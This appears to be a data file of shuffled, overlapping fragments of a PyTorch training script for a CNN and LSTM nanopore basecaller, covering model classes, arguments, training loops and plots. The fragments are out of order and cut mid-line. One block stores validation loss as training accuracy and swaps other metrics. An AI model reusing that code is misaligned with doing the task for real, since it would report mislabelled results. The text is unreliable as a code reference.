"v in list(acc_val.values())], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates\")",
"vs. updates from validation set\") ax = fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_val.values()))))), [v*100",
"= args.editD sgd = False out_classes = 5 random.seed(SEED) np.random.seed(SEED) torch.manual_seed(SEED) torch.cuda.manual_seed(SEED) torch.backends.cudnn.deterministic",
"%\".format((epoch_acc / float(iteration + 1)) * 100)) if reduce_lr: print(\"lr= \" + str(optimizer.param_groups[0]['lr']))",
"seq_length x batch_size x out_size return out_decoder, labels_sorted, sorted_len_target # In[ ]: def",
"we have reached half of the updates teacher_forcing_ratio = teacher_forcing_ratio * 0.95 else:",
"= svm.get_figure() figure.savefig(save_files_path + \"/heatmap_{}.pdf\".format(filename)) plt.clf() if split_LSTMbiases: y_len_biases = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[3]]), x.split(\".\")[2]])",
"editd_train[max_idx_val], editd_val[max_idx_val], max_idx_val)) else: f.write(\"best performances on trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation",
"sorted_encoder_output = ecoder_output[sorted_idx_target, :, :] # sort labels so that they match with",
"dict_validation_editd = {} dict_training_loss2 = {} dict_validation_loss2 = {} dict_training_acc2 = {} dict_validation_acc2",
"POSSIBILITY OF SUCH DAMAGE. \"\"\" import h5py import numpy as np import os",
"batch_size x out_size return out_decoder, labels_sorted, sorted_len_target # In[ ]: def get_train_loader_trainVal(tensor_x, sig_len,",
"len(x_len))) input_grad = np.zeros((len(y_len), len(x_len))) if split_LSTMbiases: y_len_biases = [] for name in",
"batch, earlyStopping, patience_earlyStop, weight_decay, clipping_value, lr)) f.write(\"TF={}, reduced TF ratio={}\\n\".format(teacher, reduced_TF)) f.write(\"forget gate",
"of encoder and decoder must be equal!\" assert lstm_encoder.num_layers == lstm_decoder.num_layers, \"Encoder and",
"updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates) writer.add_scalar('Accuracy/train', np.mean(acc_iteration), updates) writer.add_scalar('Accuracy/validation', np.mean(val_acc), updates) if editD: #writer.add_scalar('Edit",
"ratio=\", teacher_forcing_ratio) print(\"shuffle=\", shuffle) if val_ds is not None: input_x_val = val_ds[0] input_y_val",
"shuffle=True) if earlyStopping: # initialize the early_stopping object early_stopping = EarlyStopping(patience=patience, verbose=True, delta=0.01,",
"torch.unsqueeze(cy, 0).cuda(self.port) # (batch, 1, feature) return hy, (hy, cy), (torch.mean(ingate).cpu(), torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(),",
"input[0], input[2], input[4] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax",
"2) h2 = torch.cat([hidden2[0:hidden2.size(0):2], hidden2[1:hidden2.size(0):2]], 2) hidden = (h1, h2) batch_size = true_y_len.size(0)",
"np.concatenate(np.array(list(loss_val.values()))), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates from validation set\") ax",
"= n//2, n//2 + n//4 input_biases[idx_b+2, idx] = np.linalg.norm(m[start: end], ord=2) # output",
"edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], editd_train[max_idx_train], editd_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances",
"ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias_decoder))) print(start, end) # ingate start, end = 0,",
"* 100) checkpoint = { 'updates': out12[-1], 'model': model12.state_dict(), 'optimizer': optimizer._optimizer.state_dict()} torch.save(checkpoint, save_files_path",
"# shape of lstm_out: [seq_len, batch, output_dim] # shape of self.hidden: (a, b),",
"0: print(\"=\" * 30) print(\"batch {} in epoch {}/{}\".format(iteration+1, epoch+1, n_epochs)) print(\"=\" *",
"type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--tf_ratio', type=float, default=Range(0.0, 1.0), help=\"Teacher forcing ratio. Default=1,",
"OneHotEncoder from torch.utils.tensorboard import SummaryWriter import itertools import seaborn as sns import pandas",
"dict_training_editd, dict_validation_editd], [dict_training_loss2, dict_validation_loss2, dict_training_acc2, dict_validation_acc2, dict_training_editd2, dict_validation_editd2], [dict_activations_in, dict_activations_forget, dict_activations_cell, dict_activations_out], [dict_activations_in_decoder,",
"+ n//4 input_biases[idx_b+2, idx] = np.linalg.norm(m[start: end], ord=2) # output gate start, end",
"def __init__(self, input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_encoder = False, bidirectional=False, port=1, dropout=0):",
"= input_decoder.argmax(1) # get argmax of prediction #if teacher forcing, use actual next",
"self.lstm(packed_seq) # [seq_len, batch, input_dim] # undo the packing operation unpacked, unpacked_len =",
"OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN",
"# batch-i, features, seq len y = y[not_padded_batches, :, :] # batch-i, features,",
"# Network # ----------- # * CNN-Encoder # * LSTM-Encoder # * LSTM-Decoder",
"[dict_training_loss2, dict_validation_loss2, dict_training_acc2, dict_validation_acc2, dict_training_editd2, dict_validation_editd2], [dict_activations_in, dict_activations_forget, dict_activations_cell, dict_activations_out], [dict_activations_in_decoder, dict_activations_forget_decoder, dict_activations_cell_decoder,",
"sorted_labels, sorted_labels_len))) # ed2 = ed # else: # ed = 0 #",
"default=False) parser.add_argument(\"--editD\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) return parser # Network # -----------",
"c) + (ingate * cellgate) hy = outgate * F.tanh(cy) return hy, (hy,",
"= {} dict_training_editd = {} dict_validation_editd = {} dict_training_loss2 = {} dict_validation_loss2 =",
"seq_len, input_dim] # shape of lstm_out: [batch, seq_len, output_dim] # shape of self.hidden:",
"0:input_decoder.size(0), :] = input_decoder # [max. target length, batch size, output dim] top1",
"= range(max_label_len) outputs = torch.zeros(max_label_len, batch_size, self.output_dim).cuda(self.port) # [max. target length, batch size,",
"default=\"None\", help=\"Gradient clipping\") # early stopping parser.add_argument(\"--early_stop\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--patience',",
"dimensions of encoder and decoder must be equal!\" assert lstm_encoder.num_layers == lstm_decoder.num_layers, \"Encoder",
"= torch.cat([hidden1[0:hidden1.size(0):2], hidden1[1:hidden1.size(0):2]], 2) h2 = torch.cat([hidden2[0:hidden2.size(0):2], hidden2[1:hidden2.size(0):2]], 2) hidden = (h1, h2)",
"criterion, clipping_value=None, val_ds=None, test_ds=None, batch_size=256, n_epochs=500, teacher_forcing_ratio=0.5, reduced_TF=True, make_validation=1000, mode=\"train\", shuffle=True, patience =",
"= self.cnn_encoder(inputs, seq_len) in_lstm = torch.transpose(in_lstm, 1, 2) # input for LSTM batch_size",
"bestPerformance2File(out12[1], save_files_path + \"best_performances_{}.txt\".format(fname), editD=editD) plot_error_accuarcy_iterations_train(out12[0], pdf, editD=editD) plot_error_accuarcy_iterations_val(out12[0], pdf, editD=editD) print(\"Training took:",
"OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,",
"h = hidden[0][:, not_padded_batches, :] c = hidden[1][:, not_padded_batches, :] hidden = (h,",
"self.start = start self.end = end def __eq__(self, other): return self.start <= other",
":] sorted_hiddens = (sorted_hiddens1, sorted_hiddens2) sorted_encoder_output = ecoder_output[sorted_idx_target, :, :] # sort labels",
"test_ds=None, batch_size=256, n_epochs=500, teacher_forcing_ratio=0.5, reduced_TF=True, make_validation=1000, mode=\"train\", shuffle=True, patience = 25, file_name=\"model\", earlyStopping=False,",
"stopping parser.add_argument(\"--early_stop\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--patience', type=int, default=25, help=\"Patience in early",
"hidden[1][:, not_padded_batches, :] hidden = (h, c) label = y[not_padded_batches, :, i] #",
"beam_width=1): # Forward pass through LSTM layer # shape of lstm_in: [batch, input_dim]",
"val_ds[3] label_len_val = val_ds[4] read_val = val_ds[5] input_x = train_ds[0] input_y = train_ds[1]",
"4: \"<EOS>\", 5: \"<PAD>\"} editd = 0 num_chars = 0 for idx, length",
"labels.size(1), mode) output = torch.transpose(output, 0, 1).contiguous() # input for LSTM seq_length x",
"going to use teacher forcing or not teacher_force = random.random() < teacher_forcing_ratio #",
"label=\"update {}\".format(epoch)) plt.xlabel(\"Time Steps\") plt.ylabel(\"Activation\") if i == 1: plt.legend(bbox_to_anchor=(1.05, 1.05)) plt.title(\"{} {}\".format(label,",
"size={}, earlyStopping={}, patience={}, weight decay={}, clipping value={}, lr={}\\n\" .format(epochs, batch, earlyStopping, patience_earlyStop, weight_decay,",
"we'll initialise our hidden state as return (torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port), torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port))",
"lstm_decoder assert lstm_encoder.hidden_dim == lstm_decoder.hidden_dim, \"Hidden dimensions of encoder and decoder must be",
"CNN arguments parser.add_argument(\"--input_bias_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('-c', '--channel_number', type=int, default=256, help=\"Number",
"all of the hyperparameters of the training iteration: print(\"===== HYPERPARAMETERS =====\") print(\"batch_size=\", batch_size)",
"# ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) model12 = model12.cuda(port) print(model12,",
"scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min') #Loop for n_epochs for epoch in range(n_epochs): if earlyStopping",
"np.mean(acc_iteration), updates) writer.add_scalar('Accuracy/validation', np.mean(val_acc), updates) if editD: #writer.add_scalar('Edit Distance/train', running_editd_train, updates) writer.add_scalar('Edit Distance/validation',",
"== n_epochs-1)): if reduced_TF: #if updates > int((len(train_loader) * n_epochs)*0.5) and teacher_forcing_ratio >=",
"const=True, default=False) return parser # Network # ----------- # * CNN-Encoder # *",
"fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(list(loss_train.keys()), list(loss_train.values()),",
"Seq2Seq(cnn_encoder = CNN, lstm_encoder = lstm, lstm_decoder = lstm_dec)#.cuda(port) model12.apply(init_weights_orthogonal_lstm) for name, param",
"reshaped_sorted_labels_val[notpadded_index_val].size(0) epoch_acc_val += acc_val running_acc_val += acc_val val_acc.append(acc_val) if editD: ed_val, num_char_ref =",
"(seq_len_cnn <= 0.).sum().item() > 0: # remove neagtive samples negative_idx = seq_len_cnn >",
"\"None\" and \"lstm_encoder\" in name: print(name,param.data.size()) n = param.size(0) # forget gate start,",
"sns import pandas as pd import argparse from distutils.util import strtobool from polyleven",
"np.zeros((len(y_len), len(x_len))) input_grad = np.zeros((len(y_len), len(x_len))) if split_LSTMbiases: y_len_biases = [] for name",
"targets oder batch sortieren # unsort the output _, original_idx = sorted_idx.sort(0, descending=False)",
"hidden_original, unpacked_original # The Decoder # ----------- class LSTMCellDecoder(nn.Module): def __init__(self, input_size, hidden_size,",
"0 epoch_acc = 0 epoch_loss_val = 0 epoch_acc_val = 0 epoch_editd_val = 0",
"epochs = args.epochs make_validation = args.make_validation teacher = args.tf_ratio reduced_TF = args.reduced_tf earlyStopping",
"remove smallest element = last one #print(true_y_len, true_y_len.size()) input_decoder = input_decoder[not_padded_batches, :] #",
"editd_val[max_idx_val], max_idx_val)) else: f.write(\"best performances on trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\")",
"= (seq*batch, out dim), target = (seq*batch) # Target nicht one-hot encoden reshaped_output",
"one #print(true_y_len, true_y_len.size()) input_decoder = input_decoder[not_padded_batches, :] # get only batches that are",
"\".\" + b) input_biases = np.zeros((len(y_len_biases), len(x_len))) input_grad_biases = np.zeros((len(y_len_biases), len(x_len))) for idx,",
"f.write(\"Model:\\n\") f.write(str(model12)) f.write(\"\\nThe model has {:,} trainable parameters\\n\".format(count_parameters(model12))) f.write(\"hyperparameters:\\n\") f.write(\"epochs={}, batch size={}, earlyStopping={},",
"len(true_y_len) > 1: not_padded_batches = i < true_y_len # get indices of not",
"type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--gradient_clip', default=\"None\", help=\"Gradient clipping\") # early stopping parser.add_argument(\"--early_stop\",",
"len(np.concatenate(np.array(list(editd_val.values()))))), np.concatenate(np.array(list(editd_val.values()))), label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit distance vs.",
"\"linear\" not in name: for b in [\"input\", \"forget\", \"cell\", \"output\"]: y_len_biases.append(name +",
"A=0, C=1, G=2, T=3, EOF=4 script_dir = os.path.dirname(os.path.realpath('__file__')) # script directory file_out =",
"help=\"Port on GPU mode\") parser.add_argument('-s', '--set_seed', type=int, default=1234, help=\"Set seed\") parser.add_argument('-b', '--batch_size', type=int,",
"num_workers=0, pin_memory=False, shuffle=shuffle) # create your dataloader return(train_loader) def get_train_loader(tensor_x, sig_len, tensor_y, label_len,",
"args.forget_bias_encoder forget_bias_decoder = args.forget_bias_decoder num_layers = args.lstm_layers bidir = args.bi_lstm attention = args.attention",
"batch_first=True) # targets oder batch sortieren # unsort the output _, original_idx =",
"= input_size self.hidden_size = hidden_size self.bias = bias self.i2h = nn.Linear(input_size, 4 *",
"reduce_lr: print(\"lr= \" + str(optimizer.param_groups[0]['lr'])) print(\"teacher forcing ratio= {}\".format(teacher_forcing_ratio), \", update= \", updates,",
"reduced_TF = args.reduced_tf earlyStopping = args.early_stop patience_earlyStop = args.patience weight_decay = args.weight_decay #0.01",
"= torch.transpose(output_val, 0, 1).contiguous() # input for LSTM seq_length x out_size # Calculate",
"parser.add_argument('-l', '--cnn_layers', type=int, default=1, help=\"Number of layers in Encoder-CNN\") parser.add_argument('--pooling_type', default=\"None\", help=\"Pooling type",
"x seq_length output, sorted_labels, sorted_labels_len = model(inputs, seq_len, teacher_forcing_ratio, labels, lab_len, labels10, labels.size(1),",
"= teacher_forcing_ratio * 0.95 else: teacher_forcing_ratio # Evaluation on the validation set val_losses",
"set\") # CNN arguments parser.add_argument(\"--input_bias_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('-c', '--channel_number', type=int,",
"self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim*2, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim*2,",
"parser.add_argument('-g', '--gpu_port', type=int, default=1, help=\"Port on GPU mode\") parser.add_argument('-s', '--set_seed', type=int, default=1234, help=\"Set",
"if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll =",
"hidden, true_y_len, y_class, random_value, mode_type, beam_width=1): # Forward pass through LSTM layer #",
"# Sequence to sequence model # ----------- class Seq2Seq(nn.Module): def __init__(self, cnn_encoder, lstm_encoder,",
"0 if reduce_lr: scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min') #Loop for n_epochs for epoch in",
"and b both have shape (num_layers, batch_size, hidden_dim). # Sort instances by sequence",
"hidden2[1:hidden2.size(0):2]], 2) hidden = (h1, h2) batch_size = true_y_len.size(0) max_for = range(max_label_len) outputs",
"target = (seq*batch) # Target nicht one-hot encoden reshaped_output_val = output_val.view(-1, output_val.size(2)) reshaped_sorted_labels_val",
"bidirectional = bidir, port=port, dropout=dropout) lstm_dec = LSTMdecoder(input_dim=out_classes, hidden_dim = hidden, batch_size=batch, output_dim=out_classes,",
"# get indices of not padded sequences true_y_len = true_y_len[not_padded_batches] # remove smallest",
"default=False) parser.add_argument('--patience', type=int, default=25, help=\"Patience in early stopping\") parser.add_argument(\"--call\", type=lambda x:bool(strtobool(x)), nargs='?', const=True,",
"writer = SummaryWriter(script_dir + '/training_result_{}'.format(fname)) train_set = read_data[0] val_set = read_data[1] train_set =",
"dropout_on, dropout_p = dropout_probability, dropout_input = dropout_input, input_bias_cnn=input_bias_cnn) out_channels = CNN.output_channel[n_layers_cnn-1] lstm =",
"hidden h = h.view(x.size(0), -1) c = c.view(x.size(0), -1) x = x.view(x.size(0), -1)",
"SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE",
"true_y_len.size(0) max_for = range(max_label_len) outputs = torch.zeros(max_label_len, batch_size, self.output_dim).cuda(self.port) # [max. target length,",
"earlyStopping and early_stopping.early_stop: # break epoch loop print(\"Early stopping\") break model.train() epoch_loss =",
"self.parameters(): w.data.uniform_(-std, std) def forward(self, x, hidden): h, c = hidden h =",
"0): # or (updates == n_epochs-1)): if reduced_TF: #if updates > int((len(train_loader) *",
"batch size!\" def forward(self, inputs, seq_len, teacher_forcing_ratio, labels=None, lab_len=None, labels10=None, max_label_len=None, mode_type=\"train\", beam_width=1):",
"read_val = val_ds[5] input_x = train_ds[0] input_y = train_ds[1] input_y10 = train_ds[2] signal_len",
"= {0: \"A\", 1: \"C\", 2: \"G\", 3: \"T\", 4: \"<EOS>\", 5: \"<PAD>\"}",
"input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_decoder = False, bidirectional = False, port=1, attention=True,",
"def init_hidden(self): # This is what we'll initialise our hidden state as return",
"the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED",
"In[ ]: def get_train_loader_trainVal(tensor_x, sig_len, tensor_y, label_len, label10, batch_size, shuffle=True): my_dataset = torch.utils.data.TensorDataset(tensor_x,",
"running_loss_train += loss.item() acc = (reshaped_output[notpadded_index, :].argmax(1) == reshaped_sorted_labels[notpadded_index] ).sum().item() / reshaped_sorted_labels[notpadded_index].size(0) epoch_acc",
"sorted_labels_len_val) epoch_editd_val += ed_val running_editd_val += ed_val val_editd.append(ed_val) total_ed += ed_val total_num_chars +=",
"LSTM layer self.lstm = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=self.bidirectional, dropout=self.dropout) # self.lstm_p =",
"[v*100 for v in np.concatenate(np.array(list(acc_train.values())))], label=\"training accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy",
"if earlyStopping: checkpoint = torch.load(file_name) model.load_state_dict(checkpoint[\"model\"]) return ([[dict_training_loss, dict_validation_loss, dict_training_acc, dict_validation_acc, dict_training_editd, dict_validation_editd],",
"= torch.nn.NLLLoss(ignore_index=5)#.cuda(port) print(f'The model has {count_parameters(model12):,} trainable parameters') f = open(save_files_path + \"{}_sig_length.txt\".format(fname),",
"input_biases[idx_b+2, idx] = np.linalg.norm(m[start: end], ord=2) # output gate start, end = n//2",
"equal batch size!\" def forward(self, inputs, seq_len, teacher_forcing_ratio, labels=None, lab_len=None, labels10=None, max_label_len=None, mode_type=\"train\",",
"torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10, read_idx) # create your datset train_loader = torch.utils.data.DataLoader(my_dataset,",
"!= 5 # indices of not padded elements loss = criterion(reshaped_output, reshaped_sorted_labels.long()) loss_iteration.append(loss.item())",
"of output channels in Encoder-CNN\") parser.add_argument('-l', '--cnn_layers', type=int, default=1, help=\"Number of layers in",
"nn.Linear(hidden_size, 4 * hidden_size, bias=bias) self.port = port def reset_parameters(self): std = 1.0",
"bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_val(input, pdf=None, editD=True): sns.set(font_scale=1) loss_val, acc_val, editd_val = input[1], input[3],",
"forget_bias_decoder = args.forget_bias_decoder num_layers = args.lstm_layers bidir = args.bi_lstm attention = args.attention dropout",
"torch.nn.NLLLoss(ignore_index=5)#.cuda(port) print(f'The model has {count_parameters(model12):,} trainable parameters') f = open(save_files_path + \"{}_sig_length.txt\".format(fname), \"w\")",
"idx] = np.linalg.norm(m[start: end], ord=2) # cell gate start, end = n//2, n//2",
"sorted_hiddens2 = encoder_hidden[1][:, sorted_idx_target, :] sorted_hiddens = (sorted_hiddens1, sorted_hiddens2) sorted_encoder_output = ecoder_output[sorted_idx_target, :,",
"i] # batch-i, features, seq len y = y[not_padded_batches, :, :] # batch-i,",
"= 11 start = time.time() out12 = trainNet( model12, train_ds = train_set, optimizer=optimizer,",
"if earlyStopping and early_stopping.early_stop: # break epoch loop print(\"Early stopping\") break model.train() epoch_loss",
"dict_validation_loss = {} dict_training_acc = {} dict_validation_acc = {} dict_training_editd = {} dict_validation_editd",
"\", half of updates= \", int((len(train_loader) * n_epochs)*0.5)) # Backward pass loss.backward() #clipping_value",
"if self.bidirectional: if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim*2, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else:",
"STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT",
"acc_val, editd_train, editd_val = input[0], input[1], input[2], input[3], input[4], input[5] max_idx_train = max(acc_train,",
"torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMencoder(nn.Module): #Our batch shape for input x is [batch, seq_len,",
"# Forward pass through LSTM layer # shape of lstm_in: [batch, seq_len, input_dim]",
"help=\"Set forget gate bias in Encoder-LSTM\") parser.add_argument('--forget_bias_decoder', type=str, default=\"0\", help=\"Set forget gate bias",
"linewidths=0.0, edgecolor=\"none\") figure = svm.get_figure() figure.savefig(save_files_path + \"/heatmap_{}.pdf\".format(filename)) plt.clf() if split_LSTMbiases: y_len_biases =",
"notice, this list of conditions and the following disclaimer. 2. Redistributions in binary",
"random_value, mode_type, beam_width=1): # Forward pass through LSTM layer # shape of lstm_in:",
"it will make a checkpoint of the current model if earlyStopping: early_stopping(np.mean(val_losses), model,",
"= 0 with torch.no_grad(): for iteration_val, data_val in enumerate(val_loader): batch_x_val = data_val[0] batch_y_val",
"PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS",
"1, 1).expand_as(x) sorted_inputs = x.gather(0, index_sorted_idx.long()) # [batch, seq_len, input_dim] # pack_padded_sequence so",
"input_y10_val = val_ds[2] signal_len_val = val_ds[3] label_len_val = val_ds[4] read_val = val_ds[5] input_x",
"* 0.95 else: teacher_forcing_ratio # Evaluation on the validation set val_losses = []",
"distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit Distance vs. updates\") if pdf is",
"f.write(\"best performances on trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train],",
"for idx, length in enumerate(target_lengths): length = int(length.item()) seq = pred[idx] seq_target =",
"own_cell_encoder self.bidirectional = bidirectional self.port = port self.dropout=dropout # Define the LSTM layer",
"reduced_TF)) f.write(\"forget gate bias encoder={}, forget gate bias decoder={}\" .format(forget_bias, forget_bias_decoder)) f.close() #",
"x = np.arange(0, len(p[epoch].detach().numpy())) # this locator puts ticks at regular intervals if",
"cellgate, outgate start, end = n//2, n # ordering ingate, forgetgate, cellgate, outgate",
"out_size return out_decoder, labels_sorted, sorted_len_target # In[ ]: def get_train_loader_trainVal(tensor_x, sig_len, tensor_y, label_len,",
"total_num_chars if updates == 0: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates) writer.add_scalar('Accuracy/train', np.mean(acc_iteration),",
"{} dict_validation_editd2 = {} dict_weights = {} dict_gradients = {} running_loss_train = 0.0",
"n updates evaluation on the validation set\") # CNN arguments parser.add_argument(\"--input_bias_cnn\", type=lambda x:bool(strtobool(x)),",
"p and \"lstm\" in p and \"linear\" not in p: n = matrix_param[p].shape[0]",
"batches that are NOT padded h = hidden[0][:, not_padded_batches, :] c = hidden[1][:,",
"if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_activations(input, pdf=None, print_epoch=50000, title=\"\"):",
"np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(val_losses) dict_validation_loss2[updates] = np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc) else: writer.add_scalar('Loss/train', np.mean(loss_iteration),",
"default=256, help=\"Batch size\") parser.add_argument('-e', '--epochs', type=int, default=500, help=\"Number of epochs\") parser.add_argument('-v', '--make_validation', type=int,",
"+= 1 ax = fig.add_subplot(2, 2, i) for epoch in p.keys(): if epoch",
"stopping\") parser.add_argument(\"--call\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--editD\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False)",
"param in model12.named_parameters(): if \"bias\" in name: if forget_bias != \"None\" and \"lstm_encoder\"",
"other): return self.start <= other <= self.end def make_argparser(): parser = argparse.ArgumentParser(description='Nanopore Basecaller')",
"# * LSTM-Encoder # * LSTM-Decoder # The Encoder # ----------- class LSTMCellEncoder(nn.Module):",
"self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim,",
"== lstm_decoder.num_layers, \"Encoder and decoder must have equal number of layers!\" assert lstm_encoder.batch_size",
"editd_iteration = [] for iteration, data in enumerate(train_loader): model.train() #Set the parameter gradients",
"5 # indices of not padded elements loss_val = criterion(reshaped_output_val, reshaped_sorted_labels_val.long()) val_losses.append(loss_val.item()) epoch_loss_val",
":] = input_decoder # [max. target length, batch size, output dim] top1 =",
"= fig.add_subplot(1, 3, 2) ax.plot(list(acc_train.keys()), [v*100 for v in list(acc_train.values())], label=\"training accuracy\") if",
"f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(val_set[5])) f.write(\"Model:\\n\") f.write(str(model12)) f.write(\"\\nThe model has {:,} trainable parameters\\n\".format(count_parameters(model12))) f.write(\"hyperparameters:\\n\") f.write(\"epochs={},",
"that are NOT padded h = hidden[0][:, not_padded_batches, :] c = hidden[1][:, not_padded_batches,",
"set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances",
"self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) # Define the output layer if self.bidirectional: if self.attention:",
"= {} dict_activations_cell_decoder = {} dict_activations_out_decoder = {} dict_training_loss = {} dict_validation_loss =",
"LSTMCellEncoder(nn.Module): def __init__(self, input_size, hidden_size, bias=True): super(LSTMCellEncoder, self).__init__() self.input_size = input_size self.hidden_size =",
"input_x_val = val_ds[0] input_y_val = val_ds[1] input_y10_val = val_ds[2] signal_len_val = val_ds[3] label_len_val",
"(forgetgate * c) + (ingate * cellgate) hy = outgate * F.tanh(cy) return",
"x out_size x seq_length output, sorted_labels, sorted_labels_len = model(inputs, seq_len, teacher_forcing_ratio, labels, lab_len,",
"output_dim] # shape of self.hidden: (a, b), where a and b both have",
"idx] = np.linalg.norm(m, ord=2) if split_LSTMbiases and \"bias\" in p and \"lstm\" in",
"updates from validation set\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def",
"nn.LSTM(self.input_dim+self.hidden_dim*2, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim*2, self.num_layers, batch_first=True,",
"acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on validation set\\n\")",
"gradients to zero optimizer.zero_grad() batch_x = data[0] batch_y = data[1] seq_len = data[2]",
"create your dataloader return(train_loader) def get_train_loader(tensor_x, sig_len, tensor_y, label_len, label10, read_idx, batch_size, shuffle=False):",
"return hidden_original, unpacked_original # The Decoder # ----------- class LSTMCellDecoder(nn.Module): def __init__(self, input_size,",
"in list(acc_val.values())], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates\") if",
"reached half of the updates teacher_forcing_ratio = teacher_forcing_ratio * 0.95 else: teacher_forcing_ratio #",
"+= len(encoded_target) return editd, num_chars def trainNet(model, train_ds, optimizer, criterion, clipping_value=None, val_ds=None, test_ds=None,",
"License Copyright (c) 2021 (<EMAIL>) All rights reserved. Redistribution and use in source",
"decoder optimizer.step() if (val_ds != None) and (updates % make_validation == 0): #",
"# forget gate start, end = n//4, n//2 # ordering ingate, forgetgate, cellgate,",
"if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim*2, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll =",
